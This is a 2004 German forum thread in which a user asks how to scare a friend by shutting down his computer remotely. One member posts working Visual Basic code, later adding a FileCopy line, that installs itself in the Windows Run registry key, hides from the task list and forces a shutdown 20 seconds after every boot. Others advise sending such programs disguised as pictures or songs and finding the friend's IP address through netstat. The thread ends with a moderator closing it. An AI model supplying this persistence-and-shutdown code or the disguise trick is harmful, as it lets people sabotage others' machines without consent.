Freund ein schreck einjagen?! - Scherzviren / FunprogrammeThema ist geschlossen! |
||
---|---|---|
Thema ist geschlossen! |
||
| ||
10.04.2004, 16:56
...neu hier
||
|
||
10.04.2004, 17:20
Member
Newsforum ist ja wohl falsch - bitte nächstes mal ins richtige Forum posten!
Der erste April war doch schon also es gibt im Internet allerlei Scherzviren / Scherzprogramme oder hier oder hier die z.B. die Maus besoffen machen, oder mit lustigen Fehlermeldungen scherzen, CD Rom Laufwerk immer auf und zu machen... - auf jeden Fall nichts gefährliches! - trotzdem natürlich alles auf eigene Gefahr! ansonsten einfach mal bei Google nach: Fakeformat, burst.exe, reboot.com, screenmate etc. suchen (aufpassen bei manchen Seiten sind die Downloads Dialer!) Greetz Lp |
|
|
||
11.04.2004, 01:13
Member
Hi, wie Laserpointa schon als Linke einfügte oder stichpunktartig schrieb, wonach du suchen musst. Ich habe damals bei meiner tante besagte Programme in den Autostartordner gelegt . Nur wenn du bei deinem freund nicht an den PC kommst, hilft nur ein trick(je nachdem wie gut er sich mit PC's auskennt). Sende ihm diese Dateien und behaupte es wären schöne Bilder oder Lieder, er soll sich das mal ansehen. Der spuk geht los.
Sei dann aber bitte so freundlich und sage bzw. zeige ihm wie er die dinge wieder weg bekommt Sei dann aber auch so fair und teste diese vorher an deinem PC aus, um ihm danach auch hilfreich zur seite zu stehen. Und auf eines besonders achten: Keinerlei schadenbringende Programme, Dialer oder Viren andrehen! Denn soetwas unterstützen wir natürlich nicht! Also, immer schön fair bleiben... __________ Meine Internetpräsenz |
|
|
||
11.04.2004, 10:38
Member
Visual Basic:
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMS As Long) Private Const SWP_SHOWWINDOW = &H40 Private Const SWP_HIDEWINDOW = &H80 Private Declare Function RegOpenKeyEx Lib "advapi32.dll" _ Alias "RegOpenKeyExA" (ByVal hKey As Long, _ ByVal lpSubKey As String, ByVal ulOptions As Long, _ ByVal samDesired As Long, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" _ (ByVal hKey As Long) As Long Private Declare Function RegSetValueEx_String Lib _ "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey _ As Long, ByVal lpValueName As String, ByVal Reserved _ As Long, ByVal dwType As Long, ByVal lpData As String, _ ByVal cbData As Long) As Long Private Declare Function RegDeleteValue Lib _ "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As _ Long, ByVal lpValueName As String) As Long Const HKEY_CURRENT_USER = &H80000001 Const HKEY_LOCAL_MACHINE = &H80000002 Const KEY_QUERY_VALUE = &H1 Const KEY_SET_VALUE = &H2 Const KEY_CREATE_SUB_KEY = &H4 Const KEY_ENUMERATE_SUB_KEYS = &H8 Const KEY_NOTIFY = &H10 Const KEY_CREATE_LINK = &H20 Const KEY_ALL_ACCESS = KEY_QUERY_VALUE Or KEY_SET_VALUE _ Or KEY_CREATE_SUB_KEY Or KEY_ENUMERATE_SUB_KEYS Or _ KEY_NOTIFY Or KEY_CREATE_LINK Const ERROR_SUCCESS = 0& Const REG_NONE = 0 Const REG_SZ = 1 Sub SetAutorun(sName As String, sPath As String) Dim lResult As Long Dim KeyHandle As Long Dim Key As String Const root = HKEY_LOCAL_MACHINE Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" RegOpenKeyEx root, Key, 0, KEY_ALL_ACCESS, KeyHandle RegSetValueEx_String KeyHandle, sName, 0, REG_SZ, sPath, Len(sPath) + 1 RegCloseKey KeyHandle End Sub Private Sub form_Load() On error resume next SetAutorun "Das ist der VIRUS des JAHRTAUSENDS", "c:\windows\" & App.EXEName & ".exe" App.TaskVisible = False sleep 20000 Shell "shutdown.exe -s -t 00" End Sub MFG DAFRA P.s. Wer was nicht versteht, der soll ruhig fragen. Dieser Beitrag wurde am 11.04.2004 um 11:29 Uhr von Dafra editiert.
|
|
|
||
11.04.2004, 19:01
Member
ich!
nämlich GAAAR NICHTS!!! nur irgendwas von wegen shutdown... __________ Wir leben in einer kranken welt,aber ich bin stolz,dass ich dazu gehöre! |
|
|
||
11.04.2004, 19:53
Member
Also das ganze ist in Visual Basic geschrieben.
Der obere Teil ist dafür da, dass man später in die Registry schreiben kann. Da werden nur die Constanten festgelegt. Dann kommen wir zum ersten Sub (Sub SetAutorun(sName As String, sPath As String)) wo jetzt in der Registry in den Pfad OFTWARE\Microsoft\Windows\CurrentVersion\Run geschrieben werden kann. Diese wird dann bei Private Sub form_Load() (das heißt, was da steht, wird bei dem Programmstart ausgeführt.) erstmal das es bei einem Fehler weiter machen soll. Dann wird der oben gennante Sub SetAutorunaufgerufen wo das Programm dann sich mit dem Namen "Das ist der VIRUS des JAHRTAUSENDS" in die Autostart schreibt. Der Pfad zum Programm ist der C:\Windows\Programmname + "exe" .Das Programm wird dann im Taskmanager versteckt. (es wird nur noch unter den Prozessen aufgeführt.) Dann soll es 20 Sekunden schlafen (das Programm) und dann den Pc runter fahren. Das heist, nach einem Neustart, wenn es dann unter C:\Windows liegt, wird es gestartet und fährt nach 20 Sekunden wieder den Pc runter. Zum kopieren des Programmes nach c:\Windows reicht ein FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\" & App.EXEName & ".exe" aus. Das hab ich oben noch vergessen. MFG DAFRA |
|
|
||
13.04.2004, 21:50
...neu hier
Themenstarter Beiträge: 3 |
hi leute,
schon mal vielen Dank das ihr mir geholfen habt!THX!Wie kann ich meinen Freund über Internet einen Schreck einjagen!!Sprich net send oder so?Kennt sich wer damit aus und kann mir die lösung beschreiben?? MFG TheKeyboard |
|
|
||
13.04.2004, 21:53
Member
Zitat net send ip textDas in die Cmd.exe tippen (eingabeaufforderung) und schon poppt bei deinem Freund ein Fenster auf, wenn er den Nachrichtendienst aktiviert hat. MFG DAFRA |
|
|
||
13.04.2004, 21:55
...neu hier
Themenstarter Beiträge: 3 |
hast du auch ne ahnung wie ich seine ip herausbekomme??
|
|
|
||
13.04.2004, 22:01
Member
schick ihm wenn er Icq oder so hat ein Bild oder ne Datei und dann wenn du ne Direcktverbindung hast, guckst du schnell mit netstat nach
Einfach netstat in die Cmd MFG DAFRA |
|
|
||
13.04.2004, 22:02
Member
wenn er Dir eine eMail schreibt, findest du seine IP z.B. im Header.
ansonsten gibt es halt noch die üblichen Spielereien mit Trojanern, die allerdings nicht lustig sind und wo der Spass aufhört... - (wird in diesem Forum auch bestimmt nicht näher erläutert!) greetz Lp |
|
|
||
13.04.2004, 22:04
Administrator
Zitat Laserpointa postete^ thx (auch an den Beitrag Melder ) Thema Geschlossen! __________ Gruß Lukas |
|
|
||
Ich würde gerne meinem Freund einen Schreck einjagen!Indem ich wenn möglich sein Rechner herunterfahren kann!!Würde das gehn?mit welchen Methoden??Könnt ihr mir Helfen??Bitte schreibt back!!
THX
TheKeyboard